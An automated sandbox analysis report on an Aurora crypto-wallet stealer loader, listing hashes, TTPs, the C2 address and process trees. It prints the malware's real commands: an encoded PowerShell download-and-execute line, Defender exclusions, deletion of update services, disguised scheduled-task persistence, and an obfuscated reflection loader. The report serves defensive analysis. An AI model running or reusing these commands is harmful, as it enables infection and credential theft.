aurora | 2bcbbe13d000426f4be27871e3c472dbf33673551a684229e9234e6387b045e1

Analysis

max time kernel
18s
max time network
77s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2023 09:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

856KB
MD5

3b8f84a1a0761f8bab9d6b0a90e6949e
SHA1

9c758991135d977d2660f1b814b973db0e119efc
SHA256

2bcbbe13d000426f4be27871e3c472dbf33673551a684229e9234e6387b045e1
SHA512

3bae19a2a3abddc66faf78cab3caf99aa1988607ca844294d37450a7eb3be2454ae1a4034e38df4dabef63a2f8fd5b9084fccfcaf3d2b72ff5c62cb79bdae2e1
SSDEEP

3072:HnoTMG2OWGJAez/eyN/09XMT9THz4JHSV0h2sFeJOMkdIGq:HYfAebec09Q0ZwQCGq

Score

10^/10

aurora evasion spyware stealer

Malware Config

Extracted

Family

aurora

107.182.129.73:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

SmartDefRun.exe

description	pid	process	target process
PID 960 created 3144	960	SmartDefRun.exe	Explorer.EXE
PID 960 created 3144	960	SmartDefRun.exe	Explorer.EXE
PID 960 created 3144	960	SmartDefRun.exe	Explorer.EXE
PID 960 created 3144	960	SmartDefRun.exe	Explorer.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 1264 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 4 IoCs

Processes:

C4Loader.exenew2.exeSysApp.exeSmartDefRun.exe

pid process

1660 C4Loader.exe
2808 new2.exe
4828 SysApp.exe
960 SmartDefRun.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
15	1264	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
1660	C4Loader.exe
2808	new2.exe
4828	SysApp.exe
960	SmartDefRun.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

C4Loader.exeSmartDefRun.exe

description	pid	process	target process
PID 2144 set thread context of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 960 set thread context of 3180	960	SmartDefRun.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe SmartDefRun.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1172 sc.exe
1492 sc.exe
1676 sc.exe
1436 sc.exe
2220 sc.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe	SmartDefRun.exe

pid	process
1172	sc.exe
1492	sc.exe
1676	sc.exe
1436	sc.exe
2220	sc.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exeSmartDefRun.exepowershell.exepowershell.exe

pid	process
1264	powershell.exe
1264	powershell.exe
960	SmartDefRun.exe
960	SmartDefRun.exe
1816	powershell.exe
1816	powershell.exe
960	SmartDefRun.exe
960	SmartDefRun.exe
960	SmartDefRun.exe
960	SmartDefRun.exe
4020	powershell.exe
4020	powershell.exe
4020	powershell.exe
960	SmartDefRun.exe
960	SmartDefRun.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exewmic.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeIncreaseQuotaPrivilege	3688	wmic.exe
Token: SeSecurityPrivilege	3688	wmic.exe
Token: SeTakeOwnershipPrivilege	3688	wmic.exe
Token: SeLoadDriverPrivilege	3688	wmic.exe
Token: SeSystemProfilePrivilege	3688	wmic.exe
Token: SeSystemtimePrivilege	3688	wmic.exe
Token: SeProfSingleProcessPrivilege	3688	wmic.exe
Token: SeIncBasePriorityPrivilege	3688	wmic.exe
Token: SeCreatePagefilePrivilege	3688	wmic.exe
Token: SeBackupPrivilege	3688	wmic.exe
Token: SeRestorePrivilege	3688	wmic.exe
Token: SeShutdownPrivilege	3688	wmic.exe
Token: SeDebugPrivilege	3688	wmic.exe
Token: SeSystemEnvironmentPrivilege	3688	wmic.exe
Token: SeRemoteShutdownPrivilege	3688	wmic.exe
Token: SeUndockPrivilege	3688	wmic.exe
Token: SeManageVolumePrivilege	3688	wmic.exe
Token: 33	3688	wmic.exe
Token: 34	3688	wmic.exe
Token: 35	3688	wmic.exe
Token: 36	3688	wmic.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeIncreaseQuotaPrivilege	3688	wmic.exe
Token: SeSecurityPrivilege	3688	wmic.exe
Token: SeTakeOwnershipPrivilege	3688	wmic.exe
Token: SeLoadDriverPrivilege	3688	wmic.exe
Token: SeSystemProfilePrivilege	3688	wmic.exe
Token: SeSystemtimePrivilege	3688	wmic.exe
Token: SeProfSingleProcessPrivilege	3688	wmic.exe
Token: SeIncBasePriorityPrivilege	3688	wmic.exe
Token: SeCreatePagefilePrivilege	3688	wmic.exe
Token: SeBackupPrivilege	3688	wmic.exe
Token: SeRestorePrivilege	3688	wmic.exe
Token: SeShutdownPrivilege	3688	wmic.exe
Token: SeDebugPrivilege	3688	wmic.exe
Token: SeSystemEnvironmentPrivilege	3688	wmic.exe
Token: SeRemoteShutdownPrivilege	3688	wmic.exe
Token: SeUndockPrivilege	3688	wmic.exe
Token: SeManageVolumePrivilege	3688	wmic.exe
Token: 33	3688	wmic.exe
Token: 34	3688	wmic.exe
Token: 35	3688	wmic.exe
Token: 36	3688	wmic.exe
Token: SeIncreaseQuotaPrivilege	2268	WMIC.exe
Token: SeSecurityPrivilege	2268	WMIC.exe
Token: SeTakeOwnershipPrivilege	2268	WMIC.exe
Token: SeLoadDriverPrivilege	2268	WMIC.exe
Token: SeSystemProfilePrivilege	2268	WMIC.exe
Token: SeSystemtimePrivilege	2268	WMIC.exe
Token: SeProfSingleProcessPrivilege	2268	WMIC.exe
Token: SeIncBasePriorityPrivilege	2268	WMIC.exe
Token: SeCreatePagefilePrivilege	2268	WMIC.exe
Token: SeBackupPrivilege	2268	WMIC.exe
Token: SeRestorePrivilege	2268	WMIC.exe
Token: SeShutdownPrivilege	2268	WMIC.exe
Token: SeDebugPrivilege	2268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2268	WMIC.exe
Token: SeRemoteShutdownPrivilege	2268	WMIC.exe
Token: SeUndockPrivilege	2268	WMIC.exe
Token: SeManageVolumePrivilege	2268	WMIC.exe
Token: 33	2268	WMIC.exe
Token: 34	2268	WMIC.exe

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

C4Loader.exeInstallUtil.exepowershell.exenew2.execmd.execmd.execmd.exeSmartDefRun.exe

description	pid	process	target process
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 2144 wrote to memory of 4460	2144	C4Loader.exe	InstallUtil.exe
PID 4460 wrote to memory of 1264	4460	InstallUtil.exe	powershell.exe
PID 4460 wrote to memory of 1264	4460	InstallUtil.exe	powershell.exe
PID 4460 wrote to memory of 1264	4460	InstallUtil.exe	powershell.exe
PID 1264 wrote to memory of 1660	1264	powershell.exe	C4Loader.exe
PID 1264 wrote to memory of 1660	1264	powershell.exe	C4Loader.exe
PID 1264 wrote to memory of 1660	1264	powershell.exe	C4Loader.exe
PID 1264 wrote to memory of 2808	1264	powershell.exe	new2.exe
PID 1264 wrote to memory of 2808	1264	powershell.exe	new2.exe
PID 1264 wrote to memory of 4828	1264	powershell.exe	SysApp.exe
PID 1264 wrote to memory of 4828	1264	powershell.exe	SysApp.exe
PID 1264 wrote to memory of 4828	1264	powershell.exe	SysApp.exe
PID 1264 wrote to memory of 960	1264	powershell.exe	SmartDefRun.exe
PID 1264 wrote to memory of 960	1264	powershell.exe	SmartDefRun.exe
PID 2808 wrote to memory of 3688	2808	new2.exe	wmic.exe
PID 2808 wrote to memory of 3688	2808	new2.exe	wmic.exe
PID 2536 wrote to memory of 1492	2536	cmd.exe	sc.exe
PID 2536 wrote to memory of 1492	2536	cmd.exe	sc.exe
PID 2536 wrote to memory of 1676	2536	cmd.exe	sc.exe
PID 2536 wrote to memory of 1676	2536	cmd.exe	sc.exe
PID 2808 wrote to memory of 1972	2808	new2.exe	cmd.exe
PID 2808 wrote to memory of 1972	2808	new2.exe	cmd.exe
PID 2536 wrote to memory of 1436	2536	cmd.exe	sc.exe
PID 2536 wrote to memory of 1436	2536	cmd.exe	sc.exe
PID 2536 wrote to memory of 2220	2536	cmd.exe	sc.exe
PID 2536 wrote to memory of 2220	2536	cmd.exe	sc.exe
PID 1972 wrote to memory of 2268	1972	cmd.exe	WMIC.exe
PID 1972 wrote to memory of 2268	1972	cmd.exe	WMIC.exe
PID 2536 wrote to memory of 1172	2536	cmd.exe	sc.exe
PID 2536 wrote to memory of 1172	2536	cmd.exe	sc.exe
PID 2536 wrote to memory of 1488	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 1488	2536	cmd.exe	reg.exe
PID 2808 wrote to memory of 2416	2808	new2.exe	cmd.exe
PID 2808 wrote to memory of 2416	2808	new2.exe	cmd.exe
PID 2536 wrote to memory of 3252	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 3252	2536	cmd.exe	reg.exe
PID 2416 wrote to memory of 1812	2416	cmd.exe	WMIC.exe
PID 2416 wrote to memory of 1812	2416	cmd.exe	WMIC.exe
PID 2536 wrote to memory of 2824	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 2824	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 1704	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 1704	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 4508	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 4508	2536	cmd.exe	reg.exe
PID 960 wrote to memory of 3180	960	SmartDefRun.exe	dialer.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3144

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1264

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Executes dropped EXE
PID:1660

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
6⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
6⤵
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
7⤵
PID:1812

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
PID:4828

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2536

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1492

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1676

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1436

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2220

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1172

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1488

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3252

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:2824

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1704

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kryoeujoq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenMachine' /tr '''C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenMachine' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenMachine" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:3180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:VrSkNIIoIDfq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tGuFxjKCvQKRyy,[Parameter(Position=1)][Type]$HxsJPPntMs)$muFchuCcbPS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+'M'+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+'g'+'at'+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+'si'+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+',A'+'u'+'t'+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$muFchuCcbPS.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+'e'+'c'+''+'i'+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+'B'+'y'+'S'+'ig'+[Char](44)+'Pub'+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$tGuFxjKCvQKRyy).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$muFchuCcbPS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',Hi'+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$HxsJPPntMs,$tGuFxjKCvQKRyy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $muFchuCcbPS.CreateType();}$DpwgrwaYRGzab=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+'em'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'D'+''+'p'+'wgr'+[Char](119)+'a'+[Char](89)+''+'R'+'G'+[Char](122)+'a'+[Char](98)+'');$ZsAnGKONiHgiVm=$DpwgrwaYRGzab.GetMethod(''+'Z'+'sA'+[Char](110)+''+'G'+''+'K'+''+'O'+''+'N'+'i'+'H'+''+'g'+''+[Char](105)+''+[Char](86)+''+'m'+'',[Reflection.BindingFlags]''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JTuDYSbxrCzPWXuKGdb=VrSkNIIoIDfq @([String])([IntPtr]);$YfGNSyJAnvsivhYrufpJCb=VrSkNIIoIDfq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IveJHebbqZP=$DpwgrwaYRGzab.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+'2'+'.'+[Char](100)+'l'+[Char](108)+'')));$OyqHhhqLkzfJDu=$ZsAnGKONiHgiVm.Invoke($Null,@([Object]$IveJHebbqZP,[Object]('L'+[Char](111)+'a'+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$psnauXpbKNsrkzuqO=$ZsAnGKONiHgiVm.Invoke($Null,@([Object]$IveJHebbqZP,[Object](''+[Char](86)+'i'+[Char](114)